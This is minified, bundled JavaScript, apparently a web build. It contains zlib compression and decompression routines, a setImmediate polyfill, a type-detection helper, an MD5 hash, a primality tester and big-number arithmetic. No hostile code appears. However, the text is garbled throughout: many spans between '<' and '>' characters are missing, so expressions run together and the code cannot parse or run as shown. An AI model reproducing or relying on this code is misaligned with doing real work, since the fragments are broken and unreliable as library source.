0===me.avail_out&&(Ge.last_flush=-1),0;if(2===lt&&(1===Ke?E._tr_align(Ge):5!==Ke&&(E._tr_stored_block(Ge,0,0,!1),3===Ke&&(R(Ge.head),0===Ge.lookahead&&(Ge.strstart=0,Ge.block_start=0,Ge.insert=0))),J(me),0===me.avail_out))return Ge.last_flush=-1,0}return 4!==Ke?0:Ge.wrap<=0?1:(2===Ge.wrap?(ue(Ge,255&me.adler),ue(Ge,me.adler>>8&255),ue(Ge,me.adler>>16&255),ue(Ge,me.adler>>24&255),ue(Ge,255&me.total_in),ue(Ge,me.total_in>>8&255),ue(Ge,me.total_in>>16&255),ue(Ge,me.total_in>>24&255)):(Ie(Ge,me.adler>>>16),Ie(Ge,65535&me.adler)),J(me),0=rt.w_size&&(0===ht&&(R(rt.head),rt.strstart=0,rt.block_start=0,rt.insert=0),xe=new U.Buf8(rt.w_size),U.arraySet(xe,Ke,We-rt.w_size,rt.w_size,0),Ke=xe,We=rt.w_size),mt=me.avail_in,lt=me.next_in,ft=me.input,me.avail_in=We,me.next_in=0,me.input=Ke,Ue(rt);rt.lookahead>=3;){for(Ge=rt.strstart,Qe=rt.lookahead-2;rt.ins_h=(rt.ins_h<>>=ye=le>>>24,B-=ye,0==(ye=le>>>16&255))P[_++]=65535≤else{if(!(16&ye)){if(0==(64&ye)){le=K[(65535&le)+(O&(1<>>=ye,B-=ye),B<15&&(O+=M[C++]<>>=ye=le>>>24,B-=ye,!(16&(ye=le>>>16&255))){if(0==(64&ye)){le=ee[(65535&le)+(O&(1<>>=ye,B-=ye,(ye=_-y)>3,O&=(1<<(B-=z<<3))-1,$.next_in=C,$.next_out=_,$.avail_in=C>>24&255)+(f>>>8&65280)+((65280&f)<<8)+((255&f)<<24)}function O(){this.mode=0,this.last=!1,this.wrap=0,this.havedict=!1,this.flags=0,this.dmax=0,this.check=0,this.total=0,this.head=null,this.wbits=0,this.wsize=0,this.whave=0,this.wnext=0,this.window=null,this.hold=0,this.bits=0,this.length=0,this.offset=0,this.extra=0,this.lencode=null,this.distcode=null,this.lenbits=0,this.distbits=0,this.ncode=0,this.nlen=0,this.ndist=0,this.have=0,this.next=null,this.lens=new $.Buf16(320),this.work=new $.Buf16(288),this.lendyn=null,this.distdyn=null,this.sane=0,this.back=0,this.was=0}function B(f){var v;return f&&f.state?(f.total_in=f.total_out=(v=f.state).total=0,f.msg="",v.wrap&&(f.adler=1&v.wrap),v.mode=1,v.last=0,v.havedict=0,v.dmax=32768,v.head=null,v.hold=0,v.bits=0,v.lencode=v.lendyn=new $.Buf32(852),v.distcode=v.distdyn=new $.Buf32(592),v.sane=1,v.back=-1,0):p}function K(f){var v;return f&&f.state?((v=f.state).wsize=0,v.whave=0,v.wnext=0,B(f)):p}function ee(f,v){var M,P;return f&&f.state?(P=f.state,v<0?(M=0,v=-v):(M=1+(v>>4),v<48&&(v&=15)),v&&(v<8||15=X.wsize?($.arraySet(X.window,v,M-X.wsize,X.wsize,0),X.wnext=0,X.whave=X.wsize):(P<(G=X.wsize-X.wnext)&&(G=P),$.arraySet(X.window,v,M-P,G,X.wnext),(P-=G)?($.arraySet(X.window,v,M-P,P,0),X.wnext=P,X.whave=X.wsize):(X.wnext+=G,X.wnext===X.wsize&&(X.wnext=0),X.whave>>8&255,M.check=E(M.check,ht,2,0),Z=J=0,M.mode=2;break}if(M.flags=0,M.head&&(M.head.done=!1),!(1&M.wrap)||(((255&J)<<8)+(J>>8))%31){f.msg="incorrect header check",M.mode=30;break}if(8!=(15&J)){f.msg="unknown compression method",M.mode=30;break}if(Z-=4,me=8+(15&(J>>>=4)),0===M.wbits)M.wbits=me;else if(me>M.wbits){f.msg="invalid window size",M.mode=30;break}M.dmax=1<>8&1),512&M.flags&&(ht[0]=255&J,ht[1]=J>>>8&255,M.check=E(M.check,ht,2,0)),Z=J=0,M.mode=3;case 3:for(;Z<32;){if(0===h)break e;h--,J+=P[X++]<>>8&255,ht[2]=J>>>16&255,ht[3]=J>>>24&255,M.check=E(M.check,ht,4,0)),Z=J=0,M.mode=4;case 4:for(;Z<16;){if(0===h)break e;h--,J+=P[X++]<>8),512&M.flags&&(ht[0]=255&J,ht[1]=J>>>8&255,M.check=E(M.check,ht,2,0)),Z=J=0,M.mode=5;case 5:if(1024&M.flags){for(;Z<16;){if(0===h)break e;h--,J+=P[X++]<>>8&255,M.check=E(M.check,ht,2,0)),Z=J=0}else M.head&&(M.head.extra=null);M.mode=6;case 6:if(1024&M.flags&&(h<(Ae=M.length)&&(Ae=h),Ae&&(M.head&&(me=M.head.extra_len-M.length,M.head.extra||(M.head.extra=new Array(M.head.extra_len)),$.arraySet(M.head.extra,P,X,Ae,me)),512&M.flags&&(M.check=E(M.check,P,Ae,X)),h-=Ae,X+=Ae,M.length-=Ae),M.length))break e;M.length=0,M.mode=7;case 7:if(2048&M.flags){if(0===h)break e;for(Ae=0;me=P[X+Ae++],M.head&&me&&M.length<65536&&(M.head.name+=String.fromCharCode(me)),me&&Ae>9&1,M.head.done=!0),f.adler=M.check=0,M.mode=12;break;case 10:for(;Z<32;){if(0===h)break e;h--,J+=P[X++]<>>=7&Z,Z-=7&Z,M.mode=27;break}for(;Z<3;){if(0===h)break e;h--,J+=P[X++]<>>=1)){case 0:M.mode=14;break;case 1:if(z(M),M.mode=20,6!==v)break;J>>>=2,Z-=2;break e;case 2:M.mode=17;break;case 3:f.msg="invalid block type",M.mode=30}J>>>=2,Z-=2;break;case 14:for(J>>>=7&Z,Z-=7&Z;Z<32;){if(0===h)break e;h--,J+=P[X++]<>>16^65535)){f.msg="invalid stored block lengths",M.mode=30;break}if(M.length=65535&J,Z=J=0,M.mode=15,6===v)break e;case 15:M.mode=16;case 16:if(Ae=M.length){if(h>>=5)),Z-=5,M.ncode=4+(15&(J>>>=5)),J>>>=4,Z-=4,286>>=3,Z-=3}for(;M.have<19;)M.lens[mt[M.have++]]=0;if(M.lencode=M.lendyn,M.lenbits=7,Ke=b(0,M.lens,0,19,M.lencode,0,M.work,rt={bits:M.lenbits}),M.lenbits=rt.bits,Ke){f.msg="invalid code lengths set",M.mode=30;break}M.have=0,M.mode=19;case 19:for(;M.have>>16&255,qe=65535&Qe,!((He=Qe>>>24)<=Z);){if(0===h)break e;h--,J+=P[X++]<>>=He,Z-=He,M.lens[M.have++]=qe;else{if(16===qe){for(Ge=He+2;Z>>=He,Z-=He,0===M.have){f.msg="invalid bit length repeat",M.mode=30;break}me=M.lens[M.have-1],Ae=3+(3&J),J>>>=2,Z-=2}else if(17===qe){for(Ge=He+3;Z>>=He)),J>>>=3,Z-=3}else{for(Ge=He+7;Z>>=He)),J>>>=7,Z-=7}if(M.have+Ae>M.nlen+M.ndist){f.msg="invalid bit length repeat",M.mode=30;break}for(;Ae--;)M.lens[M.have++]=me}}if(30===M.mode)break;if(0===M.lens[256]){f.msg="invalid code -- missing end-of-block",M.mode=30;break}if(M.lenbits=9,Ke=b(1,M.lens,0,M.nlen,M.lencode,0,M.work,rt={bits:M.lenbits}),M.lenbits=rt.bits,Ke){f.msg="invalid literal/lengths set",M.mode=30;break}if(M.distbits=6,M.distcode=M.distdyn,Ke=b(2,M.lens,M.nlen,M.ndist,M.distcode,0,M.work,rt={bits:M.distbits}),M.distbits=rt.bits,Ke){f.msg="invalid distances set",M.mode=30;break}if(M.mode=20,6===v)break e;case 20:M.mode=21;case 21:if(6<=h&&258<=R){f.next_out=L,f.avail_out=R,f.next_in=X,f.avail_in=h,M.hold=J,M.bits=Z,C(f,Ie),L=f.next_out,G=f.output,R=f.avail_out,X=f.next_in,P=f.input,h=f.avail_in,J=M.hold,Z=M.bits,12===M.mode&&(M.back=-1);break}for(M.back=0;Be=(Qe=M.lencode[J&(1<>>16&255,qe=65535&Qe,!((He=Qe>>>24)<=Z);){if(0===h)break e;h--,J+=P[X++]<>De)])>>>16&255,qe=65535&Qe,!(De+(He=Qe>>>24)<=Z);){if(0===h)break e;h--,J+=P[X++]<>>=De,Z-=De,M.back+=De}if(J>>>=He,Z-=He,M.back+=He,M.length=qe,0===Be){M.mode=26;break}if(32&Be){M.back=-1,M.mode=12;break}if(64&Be){f.msg="invalid literal/length code",M.mode=30;break}M.extra=15&Be,M.mode=22;case 22:if(M.extra){for(Ge=M.extra;Z>>=M.extra,Z-=M.extra,M.back+=M.extra}M.was=M.length,M.mode=23;case 23:for(;Be=(Qe=M.distcode[J&(1<>>16&255,qe=65535&Qe,!((He=Qe>>>24)<=Z);){if(0===h)break e;h--,J+=P[X++]<>De)])>>>16&255,qe=65535&Qe,!(De+(He=Qe>>>24)<=Z);){if(0===h)break e;h--,J+=P[X++]<>>=De,Z-=De,M.back+=De}if(J>>>=He,Z-=He,M.back+=He,64&Be){f.msg="invalid distance code",M.mode=30;break}M.offset=qe,M.extra=15&Be,M.mode=24;case 24:if(M.extra){for(Ge=M.extra;Z>>=M.extra,Z-=M.extra,M.back+=M.extra}if(M.offset>M.dmax){f.msg="invalid distance too far back",M.mode=30;break}M.mode=25;case 25:if(0===R)break e;if(M.offset>(Ae=Ie-R)){if((Ae=M.offset-Ae)>M.whave&&M.sane){f.msg="invalid distance too far back",M.mode=30;break}Ue=Ae>M.wnext?M.wsize-(Ae-=M.wnext):M.wnext-Ae,Ae>M.length&&(Ae=M.length),Xe=M.window}else Xe=G,Ue=L-M.offset,Ae=M.length;for(Rve?(ye=Ue[Xe+x[v]],Z[ue+x[v]]):(ye=96,0),O=1<>L)+(B-=O)]=le<<24|ye<<16|z|0,0!==B;);for(O=1<>=1;if(0!==O?(J&=O-1,J+=O):J=0,v++,0==--Ie[f]){if(f===P)break;f=y[A+x[v]]}if(G>>7)]}function ue(Qe,ht){Qe.pending_buf[Qe.pending++]=255&ht,Qe.pending_buf[Qe.pending++]=ht>>>8&255}function Ie(Qe,ht,mt){Qe.bi_valid>16-mt?(Qe.bi_buf|=ht<>16-Qe.bi_valid,Qe.bi_valid+=mt-16):(Qe.bi_buf|=ht<>>=1,mt<<=1,0<--ht;);return mt>>>1}function Xe(Qe,ht,mt){var lt,ft,xe=new Array(16),We=0;for(lt=1;lt<=x;lt++)xe[lt]=We=We+mt[lt-1]<<1;for(ft=0;ft<=ht;ft++){var Je=Qe[2*ft+1];0!==Je&&(Qe[2*ft]=Ue(xe[Je]++,Je))}}function He(Qe){var ht;for(ht=0;ht>1;1<=mt;mt--)De(Qe,xe,mt);for(ft=Oe;mt=Qe.heap[1],Qe.heap[1]=Qe.heap[Qe.heap_len--],De(Qe,xe,1),lt=Qe.heap[1],Qe.heap[--Qe.heap_max]=mt,Qe.heap[--Qe.heap_max]=lt,xe[2*ft]=xe[2*mt]+xe[2*lt],Qe.depth[ft]=(Qe.depth[mt]>=Qe.depth[lt]?Qe.depth[mt]:Qe.depth[lt])+1,xe[2*mt+1]=xe[2*lt+1]=ft,Qe.heap[1]=ft++,De(Qe,xe,1),2<=Qe.heap_len;);Qe.heap[--Qe.heap_max]=Qe.heap[1],function(Le,$e){var st,xt,pt,vt,Wi,Ft,zt=$e.dyn_tree,pa=$e.max_code,Jt=$e.stat_desc.static_tree,Gt=$e.stat_desc.has_stree,Co=$e.stat_desc.extra_bits,jt=$e.stat_desc.extra_base,qt=$e.stat_desc.max_length,Qn=0;for(vt=0;vt<=x;vt++)Le.bl_count[vt]=0;for(zt[2*Le.heap[Le.heap_max]+1]=0,st=Le.heap_max+1;st<573;st++)qt<(vt=zt[2*zt[2*(xt=Le.heap[st])+1]+1]+1)&&(vt=qt,Qn++),zt[2*xt+1]=vt,pa>=7;ft>>=1)if(1&Te&&0!==Je.dyn_ltree[2*Oe])return 0;if(0!==Je.dyn_ltree[18]||0!==Je.dyn_ltree[20]||0!==Je.dyn_ltree[26])return 1;for(Oe=32;Oe>>3)<=(ft=Qe.opt_len+3+7>>>3)&&(ft=xe)):ft=xe=mt+5,mt+4<=ft&&-1!==ht?Ge(Qe,ht,mt,lt):4===Qe.strategy||xe===ft?(Ie(Qe,2+(lt?1:0),3),Ve(Qe,l,f)):(Ie(Qe,4+(lt?1:0),3),function(Je,Oe,Te,Le){var $e;for(Ie(Je,Oe-257,5),Ie(Je,Te-1,5),Ie(Je,Le-4,4),$e=0;$e>>8&255,Qe.pending_buf[Qe.d_buf+2*Qe.last_lit+1]=255&ht,Qe.pending_buf[Qe.l_buf+Qe.last_lit]=255&mt,Qe.last_lit++,0===ht?Qe.dyn_ltree[2*mt]++:(Qe.matches++,ht--,Qe.dyn_ltree[2*(M[mt]+y+1)]++,Qe.dyn_dtree[2*Z(ht)]++),Qe.last_lit===Qe.lit_bufsize-1},I._tr_align=function(Qe){var ht;Ie(Qe,2,3),Ae(Qe,256,l),16===(ht=Qe).bi_valid?(ue(ht,ht.bi_buf),ht.bi_buf=0,ht.bi_valid=0):8<=ht.bi_valid&&(ht.pending_buf[ht.pending++]=255&ht.bi_buf,ht.bi_buf>>=8,ht.bi_valid-=8)}},{"../utils/common":41}],53:[function(Q,ae,I){"use strict";ae.exports=function(){this.input=null,this.next_in=0,this.avail_in=0,this.total_in=0,this.output=null,this.next_out=0,this.avail_out=0,this.total_out=0,this.msg="",this.state=null,this.data_type=2,this.adler=0}},{}],54:[function(Q,ae,I){(function($){!function(U,E){"use strict";if(!U.setImmediate){var C,b,_,y,A=1,p={},D=!1,w=U.document,x=Object.getPrototypeOf&&Object.getPrototypeOf(U);x=x&&x.setTimeout?x:U,C="[object process]"==={}.toString.call(U.process)?function(K){j.nextTick(function(){O(K)})}:function(){if(U.postMessage&&!U.importScripts){var K=!0,ee=U.onmessage;return U.onmessage=function(){K=!1},U.postMessage("","*"),U.onmessage=ee,K}}()?(y="setImmediate$"+Math.random()+"$",U.addEventListener?U.addEventListener("message",B,!1):U.attachEvent("onmessage",B),function(K){U.postMessage(y+K,"*")}):U.MessageChannel?((_=new MessageChannel).port1.onmessage=function(K){O(K.data)},function(K){_.port2.postMessage(K)}):w&&"onreadystatechange"in w.createElement("script")?(b=w.documentElement,function(K){var ee=w.createElement("script");ee.onreadystatechange=function(){O(K),ee.onreadystatechange=null,b.removeChild(ee),ee=null},b.appendChild(ee)}):function(K){setTimeout(O,0,K)},x.setImmediate=function(K){"function"!=typeof K&&(K=new Function(""+K));for(var ee=new Array(arguments.length-1),se=0;se{var we=Object.prototype.toString;function de(C){return"function"==typeof C.constructor?C.constructor.name:null}Pe.exports=function(b){if(void 0===b)return"undefined";if(null===b)return"null";var _=typeof b;if("boolean"===_)return"boolean";if("string"===_)return"string";if("number"===_)return"number";if("symbol"===_)return"symbol";if("function"===_)return function I(C,b){return"GeneratorFunction"===de(C)}(b)?"generatorfunction":"function";if(function ie(C){return Array.isArray?Array.isArray(C):C instanceof Array}(b))return"array";if(function E(C){return!(!C.constructor||"function"!=typeof C.constructor.isBuffer)&&C.constructor.isBuffer(C)}(b))return"buffer";if(function U(C){try{if("number"==typeof C.length&&"function"==typeof C.callee)return!0}catch(b){if(-1!==b.message.indexOf("callee"))return!0}return!1}(b))return"arguments";if(function Q(C){return C instanceof Date||"function"==typeof C.toDateString&&"function"==typeof C.getDate&&"function"==typeof C.setDate}(b))return"date";if(function j(C){return C instanceof Error||"string"==typeof C.message&&C.constructor&&"number"==typeof C.constructor.stackTraceLimit}(b))return"error";if(function ae(C){return C instanceof RegExp||"string"==typeof C.flags&&"boolean"==typeof C.ignoreCase&&"boolean"==typeof C.multiline&&"boolean"==typeof C.global}(b))return"regexp";switch(de(b)){case"Symbol":return"symbol";case"Promise":return"promise";case"WeakMap":return"weakmap";case"WeakSet":return"weakset";case"Map":return"map";case"Set":return"set";case"Int8Array":return"int8array";case"Uint8Array":return"uint8array";case"Uint8ClampedArray":return"uint8clampedarray";case"Int16Array":return"int16array";case"Uint16Array":return"uint16array";case"Int32Array":return"int32array";case"Uint32Array":return"uint32array";case"Float32Array":return"float32array";case"Float64Array":return"float64array"}if(function $(C){return"function"==typeof C.throw&&"function"==typeof C.return&&"function"==typeof C.next}(b))return"generator";switch(_=we.call(b)){case"[object Object]":return"object";case"[object Map Iterator]":return"mapiterator";case"[object Set Iterator]":return"setiterator";case"[object String Iterator]":return"stringiterator";case"[object Array Iterator]":return"arrayiterator"}return _.slice(8,-1).toLowerCase().replace(/\s/g,"")}},807:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(5110),Q=de(265).Buffer,ae=new Array(16);function I(){j.call(this,64),this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878}function $(_,y){return _<>>32-y}function U(_,y,A,p,D,w,x){return $(_+(y&A|~y&p)+D+w|0,x)+y|0}function E(_,y,A,p,D,w,x){return $(_+(y&p|A&~p)+D+w|0,x)+y|0}function C(_,y,A,p,D,w,x){return $(_+(y^A^p)+D+w|0,x)+y|0}function b(_,y,A,p,D,w,x){return $(_+(A^(y|~p))+D+w|0,x)+y|0}ie(I,j),I.prototype._update=function(){for(var _=ae,y=0;y<16;++y)_[y]=this._block.readInt32LE(4*y);var A=this._a,p=this._b,D=this._c,w=this._d;A=U(A,p,D,w,_[0],3614090360,7),w=U(w,A,p,D,_[1],3905402710,12),D=U(D,w,A,p,_[2],606105819,17),p=U(p,D,w,A,_[3],3250441966,22),A=U(A,p,D,w,_[4],4118548399,7),w=U(w,A,p,D,_[5],1200080426,12),D=U(D,w,A,p,_[6],2821735955,17),p=U(p,D,w,A,_[7],4249261313,22),A=U(A,p,D,w,_[8],1770035416,7),w=U(w,A,p,D,_[9],2336552879,12),D=U(D,w,A,p,_[10],4294925233,17),p=U(p,D,w,A,_[11],2304563134,22),A=U(A,p,D,w,_[12],1804603682,7),w=U(w,A,p,D,_[13],4254626195,12),D=U(D,w,A,p,_[14],2792965006,17),A=E(A,p=U(p,D,w,A,_[15],1236535329,22),D,w,_[1],4129170786,5),w=E(w,A,p,D,_[6],3225465664,9),D=E(D,w,A,p,_[11],643717713,14),p=E(p,D,w,A,_[0],3921069994,20),A=E(A,p,D,w,_[5],3593408605,5),w=E(w,A,p,D,_[10],38016083,9),D=E(D,w,A,p,_[15],3634488961,14),p=E(p,D,w,A,_[4],3889429448,20),A=E(A,p,D,w,_[9],568446438,5),w=E(w,A,p,D,_[14],3275163606,9),D=E(D,w,A,p,_[3],4107603335,14),p=E(p,D,w,A,_[8],1163531501,20),A=E(A,p,D,w,_[13],2850285829,5),w=E(w,A,p,D,_[2],4243563512,9),D=E(D,w,A,p,_[7],1735328473,14),A=C(A,p=E(p,D,w,A,_[12],2368359562,20),D,w,_[5],4294588738,4),w=C(w,A,p,D,_[8],2272392833,11),D=C(D,w,A,p,_[11],1839030562,16),p=C(p,D,w,A,_[14],4259657740,23),A=C(A,p,D,w,_[1],2763975236,4),w=C(w,A,p,D,_[4],1272893353,11),D=C(D,w,A,p,_[7],4139469664,16),p=C(p,D,w,A,_[10],3200236656,23),A=C(A,p,D,w,_[13],681279174,4),w=C(w,A,p,D,_[0],3936430074,11),D=C(D,w,A,p,_[3],3572445317,16),p=C(p,D,w,A,_[6],76029189,23),A=C(A,p,D,w,_[9],3654602809,4),w=C(w,A,p,D,_[12],3873151461,11),D=C(D,w,A,p,_[15],530742520,16),A=b(A,p=C(p,D,w,A,_[2],3299628645,23),D,w,_[0],4096336452,6),w=b(w,A,p,D,_[7],1126891415,10),D=b(D,w,A,p,_[14],2878612391,15),p=b(p,D,w,A,_[5],4237533241,21),A=b(A,p,D,w,_[12],1700485571,6),w=b(w,A,p,D,_[3],2399980690,10),D=b(D,w,A,p,_[10],4293915773,15),p=b(p,D,w,A,_[1],2240044497,21),A=b(A,p,D,w,_[8],1873313359,6),w=b(w,A,p,D,_[15],4264355552,10),D=b(D,w,A,p,_[6],2734768916,15),p=b(p,D,w,A,_[13],1309151649,21),A=b(A,p,D,w,_[4],4149444226,6),w=b(w,A,p,D,_[11],3174756917,10),D=b(D,w,A,p,_[2],718787259,15),p=b(p,D,w,A,_[9],3951481745,21),this._a=this._a+A|0,this._b=this._b+p|0,this._c=this._c+D|0,this._d=this._d+w|0},I.prototype._digest=function(){this._block[this._blockOffset++]=128,this._blockOffset>56&&(this._block.fill(0,this._blockOffset,64),this._update(),this._blockOffset=0),this._block.fill(0,this._blockOffset,56),this._block.writeUInt32LE(this._length[0],56),this._block.writeUInt32LE(this._length[1],60),this._update();var _=Q.allocUnsafe(16);return _.writeInt32LE(this._a,0),_.writeInt32LE(this._b,4),_.writeInt32LE(this._c,8),_.writeInt32LE(this._d,12),_},Pe.exports=I},2465:(Pe,we,de)=>{var ie=de(3387),j=de(9598);function Q(ae){this.rand=ae||new j.Rand}Pe.exports=Q,Q.create=function(I){return new Q(I)},Q.prototype._randbelow=function(I){var $=I.bitLength(),U=Math.ceil($/8);do{var E=new ie(this.rand.generate(U))}while(E.cmp(I)>=0);return E},Q.prototype._randrange=function(I,$){var U=$.sub(I);return I.add(this._randbelow(U))},Q.prototype.test=function(I,$,U){var E=I.bitLength(),C=ie.mont(I),b=new ie(1).toRed(C);$||($=Math.max(1,E/48|0));for(var _=I.subn(1),y=0;!_.testn(y);y++);for(var A=I.shrn(y),p=_.toRed(C);$>0;$--){var w=this._randrange(new ie(2),_);U&&U(w);var x=w.toRed(C).redPow(A);if(0!==x.cmp(b)&&0!==x.cmp(p)){for(var S=1;S0;$--){var p=this._randrange(new ie(2),b),D=I.gcd(p);if(0!==D.cmpn(1))return D;var w=p.toRed(E).redPow(y);if(0!==w.cmp(C)&&0!==w.cmp(A)){for(var x=1;x<_;x++){if(0===(w=w.redSqr()).cmp(C))return w.fromRed().subn(1).gcd(I);if(0===w.cmp(A))break}if(x===_)return(w=w.redSqr()).fromRed().subn(1).gcd(I)}}return!1}},3387:function(Pe,we,de){!function(ie,j){"use strict";function Q(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var $;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{$="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(6619).Buffer}catch(z){}function U(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var v=U(z,f);return f-1>=l&&(v|=U(z,f-1)<<4),v}function C(z,l,f,v){for(var M=0,P=Math.min(z.length,f),G=l;G=49?X-49+10:X>=17?X-17+10:X}return M}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,v){if("number"==typeof l)return this._initNumber(l,f,v);if("object"==typeof l)return this._initArray(l,f,v);"hex"===f&&(f=16),Q(f===(0|f)&&f>=2&&f<=36);var M=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(M++,this.negative=1),M=0;M-=3)this.words[P]|=(G=l[M]|l[M-1]<<8|l[M-2]<<16)<>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===v)for(M=0,P=0;M>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,v){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var M=0;M=f;M-=2)X=E(l,f,M)<=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(M=(l.length-f)%2==0?f+1:f;M=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,v){this.words=[0],this.length=1;for(var M=0,P=1;P<=67108863;P*=f)M++;M--,P=P/f|0;for(var G=l.length-v,X=G%M,L=Math.min(G,G-X)+v,h=0,R=v;R1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?""};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var v=z.length+l.length|0;f.length=v,v=v-1|0;var M=0|z.words[0],P=0|l.words[0],G=M*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(M=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var v;if(f=0|f||1,16===(l=l||10)||"hex"===l){v="";for(var M=0,P=0,G=0;G>>24-M&16777215)||G!==this.length-1?b[6-L.length]+L+v:L+v,(M+=2)>=26&&(M-=26,G--)}for(0!==P&&(v=P.toString(16)+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];v="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);v=(J=J.idivn(R)).isZero()?Z+v:b[h-Z.length]+Z+v}for(this.isZero()&&(v="0"+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return Q(void 0!==$),this.toArrayLike($,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,v){var M=this.byteLength(),P=v||Math.max(1,M);Q(M<=P,"byte array longer than desired length"),Q(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h=4096&&(v+=13,f>>>=13),f>=64&&(v+=7,f>>>=7),f>=8&&(v+=4,f>>>=4),f>=2&&(v+=2,f>>>=2),v+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,v=0;return 0==(8191&f)&&(v+=13,f>>>=13),0==(127&f)&&(v+=7,f>>>=7),0==(15&f)&&(v+=4,f>>>=4),0==(3&f)&&(v+=2,f>>>=2),0==(1&f)&&v++,v},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;fl.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var v=0;vl.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,v;this.length>l.length?(f=this,v=l):(f=l,v=this);for(var M=0;Ml.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){Q("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),v=l%26;this._expand(f),v>0&&f--;for(var M=0;M0&&(this.words[M]=~this.words[M]&67108863>>26-v),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){Q("number"==typeof l&&l>=0);var v=l/26|0,M=l%26;return this._expand(v+1),this.words[v]=f?this.words[v]|1<l.length?(v=this,M=l):(v=l,M=this);for(var P=0,G=0;G>>26;for(;0!==P&&G>>26;if(this.length=v.length,0!==P)this.words[this.length]=P,this.length++;else if(v!==this)for(;Gl.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var M,P,v=this.cmp(l);if(0===v)return this.negative=0,this.length=1,this.words[0]=0,this;v>0?(M=this,P=l):(M=l,P=this);for(var 